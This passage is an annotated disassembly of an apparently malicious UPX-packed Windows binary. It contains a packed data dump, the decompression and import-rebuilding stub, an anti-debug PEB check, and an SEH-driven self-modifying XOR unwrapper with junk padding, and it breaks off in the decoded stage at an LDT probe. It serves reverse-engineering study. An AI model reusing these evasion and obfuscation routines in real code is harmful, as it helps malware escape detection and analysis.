0D96C8B11h, 70D374h dd 0BE429663h, 6B9C2ACBh, 81DD9F25h, 0E10DB3Dh, 541B0448h dd 0DCFB5413h, 265A75D6h, 5C225963h, 
6545CBC7h, 9FF3483Dh dd 0B000587h, 0B8481003h, 0FFFEB810h, 0B0EEC5Fh, 19286A05h dd 0D0B10C39h, 0A89B11h, 2ED94FC0h, 0FE17D9F5h, 885D5FC7h dd 0C91CEB8Ah, 3CE89F11h, 6048102Bh, 22E7C9D1h, 0A3F40C7Bh dd 30CA060h, 0A05E43C8h, 0CB10Ch, 2393BFEFh, 40880CA0h dd 0EC000900h, 47B00703h, 95009278h, 7C4F4014h, 0C8BF4070h dd 6C8A5Eh, 9E134307h, 788FFC27h, 0AB001385h, 13E9A65Bh dd 8D2FF810h, 0FF409CF1h, 40230EFEh, 41830C1Dh, 88840816h dd 27DD3E4Fh, 0EE10B943h, 10B801FFh, 661F200Ch, 0DAD2793h dd 0D80F7F07h, 215E59F2h, 84700118h, 90F9000Fh, 950F8457h dd 0E4D8000Fh, 7F026FC9h, 0F6C0F84h, 4AADEC00h, 6FA89A78h dd 93FC1343h, 691F88C0h, 2050586Eh, 6DB37250h, 4600AC0Ah dd 93390144h, 32C844FCh, 15123C6Bh, 0B2410275h, 53C840D7h dd 1941C00h, 21CAFFF9h, 5CC606EBh, 5C73255Ch, 24637069h dd 0BFFF97F9h, 1CEC8166h, 0E4FF07h, 65446553h, 69677562h dd 656C6976h, 266D6567h, 6441FFFBh, 7473756Ah, 656B6F54h dd 4C73176Eh, 27F76F6Fh, 707512B9h, 756C6156h, 4F174165h dd 0FFE02870h, 636FDB62h, 43347324h, 61766461h, 68336970h dd 0E3C7F88Bh, 72657475h, 5B33316Dh, 0C4AEF665h, 545F11DFh dd 57796172h, 72431735h, 0ED1A6165h, 52FB773Bh, 56F6D65h dd 140C6854h, 74726956h, 5BB55875h, 2841B5BBh, 0F78454Fh dd 356E724Eh, 9E97D1A2h, 1EF3F547h, 50545448h, 4BF7BF7Fh dd 32203C5Ch, 4B4F2057h, 4B010A0Dh, 0FF666E6Fh, 2446B76h dd 67044C2Dh, 203A6874h, 5A187525h, 2FCA587Bh, 0B5795428h dd 6DBD1D26h, 6C70A3DFh, 69856369h, 2D782F15h, 28F42DC7h dd 6F63FBB6h, 0C972706Dh, 0DB576465h, 7FCADBDDh, 544547FCh dd 64FE6600h, 6573D311h, 952BFDA1h, 6376736Dh, 0F177D3B1h dd 16DA2DDh, 320B0865h, 0EB75175Fh, 0DE336696h, 39303103h dd 9013380Fh, 0D1173E41h, 17303107h, 33645482h, 253AA45Dh dd 0B59FFF2Fh, 53678D64h, 5754464Fh, 5C455241h, 736F694Dh dd 583F756Fh, 735C836Ch, 7275435Ch, 0C356C972h, 88B770E2h dd 525CBE73h, 0FE907875h, 55B430DFh, 64135BA8h, 68736166h dd 73647A6Eh, 0DAC26C64h, 4953426Eh, 573F6177h, 5B7050AEh dd 4BF96C0Eh, 25865712h, 49236C4Ch, 3120B16Dh, 0FB43DDDEh dd 20676966h, 76D7A576h, 326576F8h, 736C979Dh, 532063CFh dd 1B654410h, 
165B991Ah, 172387B2h, 1F858D12h, 737983BFh dd 0FF42000Ch, 2DC65B20h, 23FD0AD6h, 206D1B13h, 0AC07A14h dd 374E06B5h, 7B736944h, 3251B6EEh, 672F66AAh, 632A9C6Dh dd 25B0BFDAh dd 690A6324h, 4D207974h, 0A71E6E61h, 1AC56317h, 70483185h dd 1DF8B3FFh, 415352F0h, 78018031h, 11838DF5h, 2AEC5279h dd 56FFFFFFh, 49E7F61Ch, 0BEE0EA9Bh, 7EDB21AFh, 5E1A9544h dd 85A03261h, 949F6A1Fh, 0FFFF68B1h, 843994FFh, 358F26A6h dd 0A55C1DCEh, 7AB20BC9h, 8F1D2252h, 20D25603h, 62372728h dd 0B6FDAD6h, 53773B31h, 36204549h, 0E8920915h, 0E41A1A36h dd 6F297435h, 77CF76D0h, 0C0017A83h, 0EA0B004h, 9E798C00h dd 6C7C79E7h, 0E7445460h, 34E7BE79h, 101C0428h, 3CF3CF08h dd 0E84DF8CDh, 0B0BCC4D4h, 3CC986C2h, 6883D7A4h, 0F6D37AD6h dd 6962A48Dh, 6308007Ah, 6C2E733Eh, 9AD68D76h, 766343DFh dd 77722E76h, 2ADB0700h, 6C8E6294h, 5F660FACh, 5B6370AFh dd 68306F31h, 632E7404h, 3ADD8DE7h, 6506ED0Ah, 22686345h dd 0BDACF600h, 9B6C1EB0h, 0DA61736Eh, 5775660Fh, 0BDADF0BCh dd 6EEBFF09h, 0A82E696Bh, 6E740067h, 446DACEDh, 611F206Ah dd 616B3A3Ch, 0C650D1A1h, 2DAC6D0Ch, 0B6D62FCDh, 65B9ED6h dd 2A620E71h, 86B6CE41h, 234DF29h, 0B6630B7Ah, 5D0BD8Dh dd 6E2E70F4h, 735B6917h, 1D602D27h, 78AB7003h, 8E617A0Fh dd 6C75D28Dh, 0B47029C4h, 0B42BDE5Bh, 0C2A86BC7h, 0F4F9195h dd 1336CB13h, 0F0633269h, 6F4EFD2Bh, 2E626A2Ch, 617A9BA9h dd 1F0BA81Eh, 61DB3090h, 66176362h, 0FF6C2ADFh, 6A696867h dd 6E6D6C6Bh, 0BB6B71B9h, 79787776h, 0A37FF97Fh, 4241F57Ah dd 46454443h, 4A494847h, 504F4E4Bh, 9535251h, 54FE51E9h dd 58575655h, 0EF4F5A59h, 607737E1h, 0E9652F0Bh, 7068702Eh dd 0DAD7023Fh, 0F3D6DF6h, 6E63733Fh, 0DB0C6406h, 4B6DC806h dd 3D3B76DBh, 74133F88h, 22E8C11Bh, 73C480B2h, 0C2A50285h dd 0AF3E4701h, 36391E35h, 9449B76Dh, 570F416Fh, 3546657Dh dd 0A0418565h, 6846BF0Ah, 1621430Ch, 6535CC81h, 0D2BA14B6h dd 614E2931h, 316C39C6h, 686B149Ch, 1E41C466h, 861544FCh dd 63D23535h, 8A1F79FDh, 0CB77BC2Dh, 79708509h, 450B6E38h dd 6B819834h, 73405162h, 683A05A5h, 76705953h, 0D060FE53h dd 0ED70AD5Ah, 78E194Dh, 12B5A19Bh, 540F9432h, 0CC160381h dd 182C3535h, 0D87C4E21h, 
746D0B60h, 6C727068h, 9B306E65h dd 653D6ECh, 6E1A7065h, 0B25CF1A3h, 12477520h, 0C57C6A0Bh dd 7264332Eh, 3A4CC80Fh, 0D78764DAh, 7319BFA7h, 4B4CDA4Dh dd 0B5D4E705h, 4D48200Dh, 1C480840h, 0B6213B2Fh, 1D59B3ADh dd 6BFF5470h, 4DB275FCh, 0EF72D61Ch, 41784F4Dh, 9BD96FFDh dd 0DE0D3844h, 0E66C5DBCh, 7645396Eh, 8F0A62A8h, 87704D45h dd 52317895h, 0B0DEB405h, 865CFADh, 48653353h, 84D3420Fh dd 4CEA2FCDh, 270045CEh, 0C7B5B073h, 272C440Dh, 0CDE16157h dd 15462DB5h, 4F0F4B53h, 1DC06A62h, 49986C38h, 0EB5497Ah dd 0FAABADB4h, 630A6492h, 0F67EC61Ah, 0D15A364Dh, 4BDE678Dh dd 0B0457965h, 10773858h, 5E0F64C3h, 51ED0AC2h, 0DB11400Ah dd 0C059B166h, 10219330h, 1DEDDA30h, 410C516Bh, 42609E62h dd 8745A153h, 436EC941h, 22DB3899h, 48777406h, 0FB6E3828h dd 440A1082h, 0D60E6112h, 619BB63Ah, 0DB796669h, 2B754067h dd 476F6136h, 6F186C1Bh, 18112C79h, 6F6F6770h, 0D8F5210h dd 5E3D9FE4h, 41146573h, 69757163h, 1D2B9C72h, 5494D36h dd 0ED4C3AA0h, 0DE131669h, 1CAB6DE8h, 0D1F0D685h, 72688007h dd 0C7892F5Fh, 2A6E3C5Ch, 7F1E685Fh, 0FC747319h, 7235CE66h dd 36060D11h, 0D7AB7970h, 0FC8E3D8h, 985CF073h, 10E27AE5h dd 0CD634603h, 0CC341730h, 0B965B962h, 0B3198C15h, 2C0A14D8h dd 80B0AD02h, 5C491Bh, 10B90D70h, 66DB34E1h, 24F44F41h dd 0CB6187DAh, 11515330h, 0C2D80A9Fh, 418555B6h, 6E0D0E11h dd 140C4258h, 6E6E1D7Dh, 441C3716h, 2C74532Bh, 36D96567h dd 73FF5215h, 960D0202h, 1965965h, 17346F39h, 6596590Ch dd 13040959h, 0A3811610h, 50E14027h, 5F2FB945h, 14412F99h dd 0F540D087h, 10B01E0h, 0B83B3D82h, 1312BE06h, 0B60B1D88h dd 25CEC6ACh, 0F5020B31h, 65B99D07h, 1E0C506Fh, 9791034h dd 60781BCh, 6C2BF08Eh, 8C642037h, 1E017C64h, 2B8F43D8h dd 23015D2Eh, 6230790h, 4AC42436h, 20BEE004h, 642EC7B7h dd 0FE4FBE9h, 7E8D282Bh, 1627C2DDh, 2DF804C0h, 15h, 1200B698h dd 0FF0000h, 3 dup(0) ; --------------------------------------------------------------------------- pusha mov esi, offset dword_31005000 lea edi, [esi-4000h] push edi or ebp, 0FFFFFFFFh jmp short loc_31006AF2 ; 
; ---------------------------------------------------------------------------
; UPX1 decompression stub, second half.  Entered from the stub on the line
; above, which set esi = compressed source (dword_31005000), edi = output
; (esi - 4000h), pushed edi and set ebp = -1.
; Register roles in the decoder:
;   esi = input pointer            edi = output pointer
;   ebx = 32-bit bit buffer: "add ebx,ebx" moves the next bit into CF; the
;         buffer is refilled with "mov ebx,[esi] / sub esi,-4 / adc ebx,ebx"
;         (the borrow from sub is shifted in as a low sentinel 1, so the
;         buffer only reads as 0 when it is exhausted -- the jnz tests that)
;   ebp = current match offset (negative)   ecx = match length
;   eax = scratch / gamma-coded values
; The bit scheme (literal flag, gamma-coded offset with reuse when < 3, two
; length bits then gamma, +1/+2 for far offsets, dword copy when the offset
; is <= -4) is the NRV2B decoder UPX uses.
        align   8

loc_31006AE8:                           ; CODE XREF: UPX1:loc_31006AF9j
        mov     al, [esi]               ; literal: copy one input byte to the output
        inc     esi
        mov     [edi], al
        inc     edi

loc_31006AEE:                           ; CODE XREF: UPX1:31006B86j
                                        ; UPX1:31006B9Dj
        add     ebx, ebx                ; next bit -> CF
        jnz     short loc_31006AF9      ; buffer not exhausted

loc_31006AF2:                           ; CODE XREF: UPX1:31006AE0j
        mov     ebx, [esi]              ; refill
        sub     esi, 0FFFFFFFCh         ; esi += 4 with CF = 1 (borrow)
        adc     ebx, ebx                ; shift: sentinel in, first data bit -> CF

loc_31006AF9:                           ; CODE XREF: UPX1:31006AF0j
        jb      short loc_31006AE8      ; bit 1: literal
        mov     eax, 1                  ; bit 0: read a gamma-coded value into eax

loc_31006B00:                           ; CODE XREF: UPX1:31006B0Fj
                                        ; UPX1:31006B1Aj
        add     ebx, ebx
        jnz     short loc_31006B0B
        mov     ebx, [esi]
        sub     esi, 0FFFFFFFCh
        adc     ebx, ebx

loc_31006B0B:                           ; CODE XREF: UPX1:31006B02j
        adc     eax, eax                ; eax = (eax << 1) | bit
        add     ebx, ebx
        jnb     short loc_31006B00      ; continuation bit 0: more digits follow
        jnz     short loc_31006B1C
        mov     ebx, [esi]
        sub     esi, 0FFFFFFFCh
        adc     ebx, ebx
        jnb     short loc_31006B00

loc_31006B1C:                           ; CODE XREF: UPX1:31006B11j
        xor     ecx, ecx
        sub     eax, 3
        jb      short loc_31006B30      ; value < 3: reuse the previous offset in ebp
        shl     eax, 8
        mov     al, [esi]               ; low byte of the new offset
        inc     esi
        xor     eax, 0FFFFFFFFh         ; offset = ~value (negative distance)
        jz      short loc_31006BA2      ; raw 0FFFFFFFFh: end-of-stream marker
        mov     ebp, eax

loc_31006B30:                           ; CODE XREF: UPX1:31006B21j
        add     ebx, ebx
        jnz     short loc_31006B3B
        mov     ebx, [esi]
        sub     esi, 0FFFFFFFCh
        adc     ebx, ebx

loc_31006B3B:                           ; CODE XREF: UPX1:31006B32j
        adc     ecx, ecx                ; first of two length bits
        add     ebx, ebx
        jnz     short loc_31006B48
        mov     ebx, [esi]
        sub     esi, 0FFFFFFFCh
        adc     ebx, ebx

loc_31006B48:                           ; CODE XREF: UPX1:31006B3Fj
        adc     ecx, ecx                ; second length bit
        jnz     short loc_31006B6C      ; 2-bit length != 0: use it
        inc     ecx                     ; else gamma-code the length, +2 afterwards

loc_31006B4D:                           ; CODE XREF: UPX1:31006B5Cj
                                        ; UPX1:31006B67j
        add     ebx, ebx
        jnz     short loc_31006B58
        mov     ebx, [esi]
        sub     esi, 0FFFFFFFCh
        adc     ebx, ebx

loc_31006B58:                           ; CODE XREF: UPX1:31006B4Fj
        adc     ecx, ecx
        add     ebx, ebx
        jnb     short loc_31006B4D
        jnz     short loc_31006B69
        mov     ebx, [esi]
        sub     esi, 0FFFFFFFCh
        adc     ebx, ebx
        jnb     short loc_31006B4D

loc_31006B69:                           ; CODE XREF: UPX1:31006B5Ej
        add     ecx, 2

loc_31006B6C:                           ; CODE XREF: UPX1:31006B4Aj
        cmp     ebp, 0FFFFF300h         ; CF = offset further back than 0D00h
        adc     ecx, 1                  ; length += 1 (+2 for far offsets)
        lea     edx, [edi+ebp]          ; edx = match source inside the output
        cmp     ebp, 0FFFFFFFCh
        jbe     short loc_31006B8C      ; distance >= 4: dword copy is safe

loc_31006B7D:                           ; CODE XREF: UPX1:31006B84j
        mov     al, [edx]               ; overlapping short-distance copy, byte-wise
        inc     edx
        mov     [edi], al
        inc     edi
        dec     ecx
        jnz     short loc_31006B7D
        jmp     loc_31006AEE
; ---------------------------------------------------------------------------
        align   4

loc_31006B8C:                           ; CODE XREF: UPX1:31006B7Bj
                                        ; UPX1:31006B99j
        mov     eax, [edx]              ; dword copy, may overshoot by up to 3 bytes
        add     edx, 4
        mov     [edi], eax
        add     edi, 4
        sub     ecx, 4
        ja      short loc_31006B8C
        add     edi, ecx                ; ecx <= 0 here: back edi up to the exact end
        jmp     loc_31006AEE
; ---------------------------------------------------------------------------
; Post-processing: undo the call/jmp filter, then rebuild the import table.

loc_31006BA2:                           ; CODE XREF: UPX1:31006B2Cj
        pop     esi                     ; esi = output base pushed at stub entry
        mov     edi, esi
        mov     ecx, 82h                ; number of filtered call/jmp sites to patch

loc_31006BAA:                           ; CODE XREF: UPX1:31006BB1j
                                        ; UPX1:31006BB6j
        mov     al, [edi]
        inc     edi
        sub     al, 0E8h                ; al = 0 for E8 (call), 1 for E9 (jmp)

loc_31006BAF:                           ; CODE XREF: UPX1:31006BD4j
        cmp     al, 1
        ja      short loc_31006BAA      ; not call/jmp: keep scanning
        cmp     byte ptr [edi], 1       ; filtered sites carry a marker byte of 1;
        jnz     short loc_31006BAA      ;   anything else is left untouched
        mov     eax, [edi]              ; marker + 3 big-endian bytes
        mov     bl, [edi+4]             ; prefetch the byte after this instruction
        shr     ax, 8                   ; these three insns drop the marker and turn
        rol     eax, 10h                ;   the remaining 3 bytes into a little-endian
        xchg    al, ah                  ;   24-bit value
        sub     eax, edi                ; make it relative to this site:
        sub     bl, 0E8h                ;   (bl pre-classified like loc_31006BAA does)
        add     eax, esi                ;   rel = esi + value - edi
        mov     [edi], eax
        add     edi, 5                  ; past the displacement and the prefetched byte
        mov     eax, ebx                ; al = next byte - E8h
        loop    loc_31006BAF            ; one site fewer to patch
        lea     edi, [esi+4000h]        ; import list left by the decoder at the end
                                        ;   of the decompressed image

loc_31006BDC:                           ; CODE XREF: UPX1:31006BFEj
        mov     eax, [edi]              ; DLL name offset; 0 terminates the list
        or      eax, eax
        jz      short loc_31006C27
        mov     ebx, [edi+4]            ; RVA of this DLL's first IAT slot
        lea     eax, [eax+esi+6000h]    ; name string lives in UPX2 (esi + 6000h + off)
        add     ebx, esi                ; ebx = &IAT[0]
        push    eax
        add     edi, 8
        call    dword ptr [esi+608Ch]   ; 3100708Ch: first KERNEL32 thunk of the UPX2
                                        ;   table (LoadLibraryA by the name order there;
                                        ;   only dword_31007090 is IDA-resolved)
        xchg    eax, ebp                ; ebp = HMODULE

loc_31006BF9:                           ; CODE XREF: UPX1:31006C1Fj
        mov     al, [edi]               ; entry type byte; 0 ends this DLL's imports
        inc     edi
        or      al, al
        jz      short loc_31006BDC
        mov     ecx, edi                ; (large count for the scasb below)
        jns     short near ptr loc_31006C0A+1 ; bit 7 clear: import by name
        movzx   eax, word ptr [edi]     ; bit 7 set: 16-bit ordinal follows
        inc     edi
        push    eax
        inc     edi

loc_31006C0A:                           ; CODE XREF: UPX1:31006C02j
        mov     ecx, 0AEF24857h         ; disassembler artefact: the by-name path enters
                                        ;   at loc_31006C0A+1, where the immediate bytes
                                        ;   57 48 F2 AE read as push edi / dec eax /
                                        ;   repne scasb -- push the name pointer, then
                                        ;   (type byte presumably 1, so al becomes 0)
                                        ;   advance edi past the NUL terminator
        push    ebp                     ; hModule
        call    dword ptr [esi+6090h]   ; dword_31007090: GetProcAddress (IDA-resolved)
        or      eax, eax
        jz      short loc_31006C21      ; unresolved import: abort
        mov     [ebx], eax              ; fill the IAT slot
        add     ebx, 4
        jmp     short loc_31006BF9
; ---------------------------------------------------------------------------

loc_31006C21:                           ; CODE XREF: UPX1:31006C18j
        call    dword ptr [esi+6094h]   ; third KERNEL32 thunk (ExitProcess by the
                                        ;   UPX2 name order); not expected to return

loc_31006C27:                           ; CODE XREF: UPX1:31006BE0j
        popa                            ; registers as saved at stub entry
        jmp     loc_31001D88            ; original entry point inside UPX0
; ---------------------------------------------------------------------------
        align   400h
UPX1    ends

; Section 3. (virtual address 00007000)
; Virtual size : 00012000 ( 73728.)
; Section size in file : 00012000 ( 73728.)
; Offset to raw data for section: 00007000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
; UPX2 holds (a) the minimal import table UPX keeps for the packed image and
; (b) an unrelated second stage at 31009000: an SEH-driven, self-modifying XOR
; unwrapper followed by the code it reveals.  The section is writable and
; executable, which is what makes the in-place decoding below possible.
UPX2    segment para public 'CODE' use32
        assume cs:UPX2
        ;org 31007000h
        assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
; IMAGE_IMPORT_DESCRIPTOR list, five dwords each {OriginalFirstThunk,
; TimeDateStamp, ForwarderChain, Name, FirstThunk}; six entries plus an
; all-zero terminator.  Name/FirstThunk are RVAs into this section.
        dd 3 dup(0)                     ; desc 0: first three fields
        dd 70C4h, 708Ch, 3 dup(0)       ; desc 0: Name="KERNEL32.DLL", IAT=708Ch; desc 1 head
        dd 70D1h, 709Ch, 3 dup(0)       ; desc 1: "ADVAPI32.dll", IAT=709Ch; desc 2 head
        dd 70DEh, 70A4h, 3 dup(0)       ; desc 2: "MSVCRT.dll",   IAT=70A4h; desc 3 head
        dd 70E9h, 70ACh, 3 dup(0)       ; desc 3: "USER32.dll",   IAT=70ACh; desc 4 head
        dd 70F4h, 70B4h, 3 dup(0)       ; desc 4: "WININET.dll",  IAT=70B4h; desc 5 head
        dd 7100h, 70BCh, 5 dup(0)       ; desc 5: "WS2_32.dll",   IAT=70BCh; terminator
; Import address tables, one 0-terminated list per DLL.  The values are the
; resolved addresses captured in this dump; only dword_31007090 carries an
; IDA resolution, the rest are labelled by position in the name list below.
        dd 7C801D77h                    ; 3100708Ch KERNEL32[0]: "LoadLibraryA" by name order
dword_31007090 dd 7C80ADA0h             ; resolved to->KERNEL32.GetProcAddress
                                        ; sub_3101101F+31r
        dd 7C81CDDAh, 0                 ; KERNEL32[2]: "ExitProcess" by name order; end
        dd 77DD6BF0h, 0                 ; ADVAPI32: same value UPX0 annotates as RegCloseKey
        dd 77C371D3h, 0                 ; MSVCRT: "rand" by name order
        dd 7E41A8ADh, 0                 ; USER32: "wsprintfA" by name order
        dd 42C2C8A1h, 0                 ; WININET: "InternetOpenA" by name order
        dd 71AB9639h, 0                 ; WS2_32: no name string follows -- unverified
; Name strings (ASCII, NUL-terminated; zero hint/padding bytes between).
        dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h ; "KERNEL32.DLL" "ADVAPI3
        dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h ; 2.dll" "MSVCRT.dll" "USE
        dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h ; R32.dll" "WININET.dll" "WS2_
        dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h ; 32.dll" "LoadLibraryA" "Ge
        dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h ; tProcAddress" "ExitPr
        dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 61720000h ; ocess" "RegCloseKey" "ra
        dd 646Eh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h ; nd" "wsprintfA" "Internet
        dd 6E65704Fh, 41h, 26h dup(0)   ; OpenA"
; The seven lines below decode as x86 code, not data (5B E8 .. = pop ebx /
; call): a call $+5 / pop ebp / sub ebp,402320h delta, a read of
; fs:[18h] -> [+30h] -> byte [+2] (TEB -> PEB -> BeingDebugged) with a branch
; on it, a lodsb / xor al,[ebp+402377h] / stosb loop, and an SEH frame setup
; (push fs:[eax] / mov fs:[eax],esp) next to a 12345678h immediate.  Nothing
; visible references it; looks like a leftover anti-debug/decrypt stub built
; for a 400000h image base -- confirm before relying on it.
        dd 59E85Bh, 648B0000h, 0EBB80824h, 0EB000004h, 0A16764FAh
        dd 408B0018h, 40B60F30h, 0F88302h, 0E83C75h, 5D000000h
        dd 2320ED81h, 858B0040h, 402367h, 236F8503h, 0F08B0040h
        dd 236B858Bh, 85030040h, 40236Fh, 33FE8B50h, 8532ACC9h
        dd 402377h, 8D3B41AAh, 402373h, 2BC3EF7Ch, 30FF64C0h, 0B8208964h
        dd 12345678h, 50000387h, 6AD00000h, 0
        dd 1E003100h, 680000h, 760h dup(0)
; ---------------------------------------------------------------------------
; Stage-2 entry at 31009000.  Nothing visible in this listing transfers
; control here (the UPX stub jumps to 31001D88).  Sequence:
;   pusha / push ebp / call sub_31009023 -> that routine registers the return
;   address 3100900A (the "cld" below) as an SEH handler, copies ebp into the
;   immediate of "mov ebp, 12FFA0h", then deliberately faults.  The handler
;   runs here: sub_310090E7 points CONTEXT.Eip at 31009010 and returns
;   ExceptionContinueExecution, so the thread resumes at "mov eax, eax" with
;   the faulting registers, ebp is rebuilt from the patched immediate and
;   control joins loc_3100906B inside sub_31009023.
; The jmp $+2 / cmc / stc / clc / nop / xchg ebx,ebx / mov r,r pairs all over
; this stage are junk padding.
        clc
        pusha
        push    ebp
        mov     ebp, esp
        call    sub_31009023            ; pushes 3100900A = SEH handler address
        cld                             ; <- handler entry (ExcRec, Frame, Context, Dispatch)
        call    sub_310090E7            ; CONTEXT.Eip = 31009010, eax = 0
        mov     eax, eax                ; <- execution resumes here
        cld
        mov     ebp, 12FFA0h            ; DATA XREF: sub_31009023+Cw
                                        ; imm32 rewritten at run time; 12FFA0h is the
                                        ;   value captured in this dump
        jmp     short $+2
        cmc
        stc
        jmp     short $+2
        jmp     loc_3100906B

; =============== S U B R O U T I N E =======================================
; sub_31009023 -- SEH/self-modifying unwrapper for the rest of the stage.
; In:  ebp = frame of the entry above ([ebp-4] = our return address after the
;      push below becomes [ebp-8]); esp+20h.. = the pusha'd registers.
; 1. push {old fs:0, return address} and install it as the SEH frame;
; 2. write ebp into the imm32 of "mov ebp, 12FFA0h" (loc_31009013+1);
; 3. GetProcAddress(40h, 2, ...) -- hModule 40h lies in the unmapped first
;    64 KiB, so this presumably faults and the handler resumes us at
;    loc_3100906B via the entry code;
; 4. edi = 40h (obfuscated), edx = address of the "call $+5" that follows
;    sub_310090E7, then [edx] ^= 40h over 29CCh bytes (sub_310090D1);
; 5. unhook SEH, "leave" back to the pusha block, overwrite its edx slot
;    with the decoded address, popa, jmp edx.  Never returns normally.
; This dump already shows the XORed region in decoded form.
sub_31009023 proc near                  ; CODE XREF: UPX2:31009005p

var_C   = dword ptr -0Ch

        push    dword ptr fs:0          ; EXCEPTION_REGISTRATION {Next, Handler=3100900A}
        mov     fs:0, esp
        mov     dword ptr ds:loc_31009013+1, ebp ; self-modifying: stash ebp in the imm32
        jmp     short $+2
        nop
        jmp     short $+2
        stc
        xor     ecx, ecx
        push    ecx                     ; twelve pushes, never popped: the stack is
        push    ecx                     ;   recovered through ebp / leave later
        push    ecx
        push    80000000h
        push    ecx
        push    800h
        push    80000000h
        push    80000000h
        push    ecx
        push    80000000h
        push    2                       ; lpProcName = 2 (an ordinal)
        push    40h                     ; hModule = 40h -> access violation expected
        call    ds:dword_31007090       ; GetProcAddress

loc_3100906B:                           ; CODE XREF: UPX2:3100901Ej
                                        ; reached through the SEH handler, not by fall-through
        clc
        cld
        sub     edi, edi
        sub     ecx, ecx
        cmc
        mov     cl, 40h
        mov     edx, edx
        stc

loc_31009077:                           ; CODE XREF: sub_31009023+5Aj
        lea     edi, [edi+1]            ; 64 iterations: edi = 40h, the XOR key
        mov     edx, edx
        cld
        loop    loc_31009077
        call    sub_310090E0            ; edx = address of the next instruction
        clc
        cld
        add     edx, 71h                ; edx -> the "call $+5" after sub_310090E7
        push    edx                     ;   (310090F5 by the listing's addresses)
        mov     ecx, 29CCh              ; length of the wrapped region
        nop
        cld
        cmc

loc_31009095:                           ; CODE XREF: sub_31009023+84j
        call    sub_310090D1            ; [edx] ^= 40h
        mov     ecx, ecx
        add     edx, 1
        sub     ecx, 1
        mov     ecx, ecx
        cmp     ecx, 0
        ja      short loc_31009095
        pop     edx                     ; edx = start of the decoded code
        nop
        mov     edi, [ebp-8]            ; old fs:0 saved by the push above
        mov     fs:0, edi               ; unhook
        jmp     short $+2
        xchg    ebx, ebx
        cld
        jmp     short $+2
        leave                           ; esp -> pusha block (edi slot), ebp restored
        clc
        mov     [esp+20h+var_C], edx    ; esp+14h = the saved edx slot
        jmp     short $+2
        cld
        cmc
        xchg    ebx, ebx
        nop
        popa                            ; edx = decoded-code address, rest as at entry
        xchg    ebx, ebx
        stc
        mov     edx, edx
        jmp     edx                     ; enter the decoded code
sub_31009023 endp

; ---------------------------------------------------------------------------
        clc

; =============== S U B R O U T I N E =======================================
; sub_310090D1 -- XOR one byte in place: [edx] ^= low byte of di.
; In: edx -> byte, di = key (40h here).  Out: al = the original byte.
sub_310090D1 proc near                  ; CODE XREF: sub_31009023:loc_31009095p
        xchg    al, [edx]               ; al <- byte
        clc
        stc
        xor     ax, di                  ; al ^= key (ah ^= 0 while di = 40h)
        clc
        xchg    al, [edx]               ; write back; al = original byte
        cmc
        retn
sub_310090D1 endp

; ---------------------------------------------------------------------------
        align 10h

; =============== S U B R O U T I N E =======================================
; sub_310090E0 -- get-EIP helper: returns with edx = its own return address.
sub_310090E0 proc near                  ; CODE XREF: sub_31009023+5Cp
        pop     edx
        clc
        cld
        stc
        push    edx
        retn
sub_310090E0 endp

; ---------------------------------------------------------------------------
        clc

; =============== S U B R O U T I N E =======================================
; sub_310090E7 -- tail of the SEH handler.  Called from 3100900B, so on entry
; [esp] = 31009010, [esp+4] = dispatcher return, [esp+8] = ExceptionRecord,
; [esp+0Ch] = EstablisherFrame, [esp+10h] = CONTEXT.  Pops its own return
; address into CONTEXT.Eip (offset 0B8h) and returns to the dispatcher with
; eax = 0 (ExceptionContinueExecution): the faulting thread resumes at
; 31009010 with its registers otherwise untouched.
sub_310090E7 proc near                  ; CODE XREF: UPX2:3100900Bp

arg_C   = dword ptr 10h

        mov     edx, [esp+arg_C]        ; edx = CONTEXT*
        xor     eax, eax                ; ExceptionContinueExecution
        pop     dword ptr [edx+0B8h]    ; CONTEXT.Eip = 31009010
        retn                            ; to the dispatcher
sub_310090E7 endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; Decoded stage (the region XORed by sub_31009023 starts at the "call $+5").
; eax = address of the "cld" (get-EIP); ebp = eax - 101005h is a delta such
; that [ebp+101000h] is the "call $+5" and every [ebp+1xxxxxh] reference
; addresses this blob as if it were based at 101000h.  [eax+29BBh] and the
; later [ebp+1039C0h] are the same flags dword; [eax+3303h/3307h/330Bh] are
; the same cells as [ebp+104308h/10430Ch/104310h] (saved ebx/esi/edi).
        cmc
        call    $+5
        cld
        mov     eax, [esp]              ; eax = own address
        mov     ecx, [eax+29BBh]        ; flags dword
        mov     [eax+3303h], ebx        ; save caller's ebx
        and     ecx, 400000h            ; "restore the call site" mode bit
        mov     ebx, [esp+4]            ; ebx = return address into the caller
        jz      short loc_31009142      ; (call $+5 slot is then left on the stack)
        pop     ecx                     ; drop the call $+5 slot
        mov     [eax+3307h], esi        ; save esi and edi as well
        mov     cl, [eax+29BFh]         ; first byte of a saved 5-byte instruction
        mov     [eax+330Bh], edi        ;   (loc_310091E5 writes it back to the site)
        cmp     cl, 0E8h
        jz      short loc_31009136      ; E8: a call rel32 was saved
        mov     ebx, [eax+29C1h]        ; else bytes 2..5 are taken as an absolute
        jmp     short loc_31009140      ;   pointer (call dword ptr [imm32] shape)
; ---------------------------------------------------------------------------

loc_31009136:                           ; CODE XREF: UPX2:3100912Cj
        mov     ecx, [eax+29C0h]        ; rel32 of the saved call
        mov     ebx, [ecx+ebx+2]        ; ebx = [retaddr + rel32 + 2]

loc_31009140:                           ; CODE XREF: UPX2:31009134j
        mov     ebx, [ebx]              ; dereference: an address inside the module
                                        ;   the call targeted (kernel32, presumably)

loc_31009142:                           ; CODE XREF: UPX2:31009114j
        push    ebp
        mov     ebp, eax
        sub     dword ptr [esp+4], 1EFAh ; adjust the slot the final retn will use
        sub     ebp, 101005h            ; ebp = blob delta (see above)
        mov     edi, [esp+4]
        lea     esi, [ebp+1039CCh]
        mov     ecx, 0
        rep movsb                       ; ecx = 0: copies nothing (junk / anti-emulation?)
        sldt    cx                      ; LDT selector
        test    ecx, ecx
        jnz     short loc_31009170      ; non-zero LDT: skip the probe
